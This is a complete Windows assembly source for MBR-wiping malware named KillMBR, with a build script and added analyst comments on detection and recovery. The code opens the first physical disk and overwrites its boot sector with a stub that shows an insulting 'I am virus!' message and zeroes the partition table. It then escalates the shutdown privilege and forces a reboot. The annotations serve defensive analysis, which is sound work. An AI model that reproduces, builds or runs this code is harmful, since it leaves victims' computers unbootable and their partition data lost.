; =========================================================================
; -------------------------------------------------------------------------
;     FILENAME : KillMBR.asm
; -------------------------------------------------------------------------
;       AUTHOR : Xylitol
;        EMAIL : xylitol☆temari.fr
; DATE CREATED : 18/07/2014
;         TEST : Windows XP SP3
;         SIZE : 3Kb - 21e3c553ef9ba6a2535a6fa159d81252
;  DESCRIPTION : Overwrite the bootloader and reboot
; -------------------------------------------------------------------------
;                 This source is considered dangerous
; -------------------------------------------------------------------------
; =========================================================================
;
; ---- Analyst notes (added on review) ------------------------------------
; What the code below does, as visible in this file: it opens the first
; physical disk (\\.\PhysicalDrive0) for writing, copies a prepared 512-byte
; sector into a buffer, writes that sector at the handle's initial position
; (offset 0, i.e. sector 0, the MBR -- no SetFilePointer is issued), enables
; the shutdown privilege through the undocumented ntdll export
; RtlAdjustPrivilege, and calls ExitWindowsEx to reboot. The replacement
; sector carries the 55h,0AAh boot signature, so firmware will execute it on
; the next boot in place of the original boot code.
;
; Detection / mitigation, from the defender's side:
;  - A user-mode process opening \\.\PhysicalDrive<N> with GENERIC_WRITE and
;    then calling WriteFile on that handle is a high-signal event; so is
;    RtlAdjustPrivilege(19 = SE_SHUTDOWN_PRIVILEGE) followed directly by
;    ExitWindowsEx. Both pairs are cheap to alert on.
;  - Opening a physical drive for writing requires administrative rights, so
;    running users without local admin removes the ability to execute this as
;    written; controls that block raw sector writes from user mode stop the
;    overwrite itself.
;  - Impact: only the first 512 bytes of the disk are written, but the
;    replacement sector's partition-table area (bytes 446..509) is all zeros,
;    so the partition table is lost along with the boot code. Recovery means
;    restoring the MBR/partition table from a backup or rebuilding it with a
;    partition-recovery tool; file system contents are not touched by this
;    code.

; ---- make.bat -----------------------------------------------------------
;@echo off
;set path=\masm32\bin
;set lib=\masm32\lib
;set name=KillMBR
;ml.exe /c /coff "%name%".asm
;link.exe /SUBSYSTEM:WINDOWS /opt:nowin98 /LIBPATH:"%lib%" "%name%".obj
;del *.OBJ
;pause
;@echo on
;cls

; ---- skeleton -----------------------------------------------------------
.386
.model flat, stdcall
option casemap :none   ; case sensitive

; ---- Include ------------------------------------------------------------
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\ntdll.inc          ; needed for RtlAdjustPrivilege (undocumented export)
include \masm32\include\shell32.inc
include \masm32\macros\macros.asm

includelib \masm32\lib\shell32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\ntdll.lib

; ---- Initialized data ---------------------------------------------------
.data
; Raw device path of the first physical disk: sector-level access that
; bypasses the file system entirely. The string itself is a usable indicator.
volume  db '\\.\PhysicalDrive0',0

; New bootloader will print "I am virus! Fuck you :-)"
; Exactly 512 bytes, one sector: a short 16-bit real-mode stub (the CDh,10h
; byte pairs are BIOS int 10h video-service calls), the message as ASCII,
; zero padding -- which also zeroes the partition-table area at bytes
; 446..509 -- and the 55h,0AAh boot signature as the final two bytes.
KillMBR     db  0B8h,12h,00h,0CDh,10h,0BDh,18h,7Ch,0B9h,18h,00h,0B8h,01h,13h,0BBh,0Ch
        db  00h,0BAh,1Dh,0Eh,0CDh,10h,0E2h,0FEh,49h,20h,61h,6Dh,20h,76h,69h,72h
        db  75h,73h,21h,20h,46h,75h,63h,6Bh,20h,79h,6Fh,75h,20h,3Ah,2Dh,29h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h
        db  00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,55h,0AAh

; ---- Uninitialized data -------------------------------------------------
.data?
buffer      dd 512 dup (?)          ; 512 DWORDs = 2048 bytes; only the first 512 bytes are filled by the copy below
bytesWritten    dd 512 dup (?)      ; WriteFile's lpNumberOfBytesWritten only needs one DWORD; the remainder is unused
hFile       dd ?                    ; handle returned by CreateFile

; ---- Code ---------------------------------------------------------------
.code
start:
    ; Open the physical disk itself (not a volume): read+write access, any
    ; sharing, must already exist. This is the call that needs administrative
    ; rights and the one a defender should alert on.
    invoke CreateFile,offset volume,GENERIC_READ+GENERIC_WRITE,FILE_SHARE_READ+FILE_SHARE_WRITE,0,OPEN_EXISTING,0,0
        .if eax==0 ;If fail jump on ExitProcess
        ; (empty branch: falls through past .endif to finish)
        .else
            mov hFile,eax
                cld ;Trick to move the bootloader into the buffer with rep movsb
                ; DF=0 so rep movsb copies forward: ecx=512 bytes from KillMBR into buffer
                lea esi, KillMBR
                lea edi, buffer
                mov ecx, 512
                rep movsb
            push eax                ; pushes the handle; never popped, so esp stays 4 bytes lower from here on
            mov eax,esp             ; overwritten by the WriteFile return value below; appears to be leftover
    ; No SetFilePointer is issued, so the 512 bytes land at the handle's
    ; initial position: offset 0 = sector 0 = the MBR.
    invoke WriteFile,hFile,addr buffer,512,addr bytesWritten,NULL ;write the new bootloader
        .if eax==0 ;If fail jump on ExitProcess
        .else
            invoke CloseHandle,hFile
            ; RtlAdjustPrivilege(Privilege=13h (19 = SE_SHUTDOWN_PRIVILEGE), Enable=1,
            ; CurrentThread=0 (process token), Enabled=esp). The previous-state
            ; output is written to [esp] -- presumably the slot left by the push
            ; above. Undocumented ntdll export; its use immediately before
            ; ExitWindowsEx is a recognisable behavioural signature.
            invoke RtlAdjustPrivilege,13h,1h,0h,esp ;Needed for reboot
            ; uFlags=2 (EWX_REBOOT), dwReason=10 (shutdown reason code)
            invoke ExitWindowsEx,2,10 ;Reboot the computer
        .endif
        .endif
finish:
    invoke ExitProcess,0
end start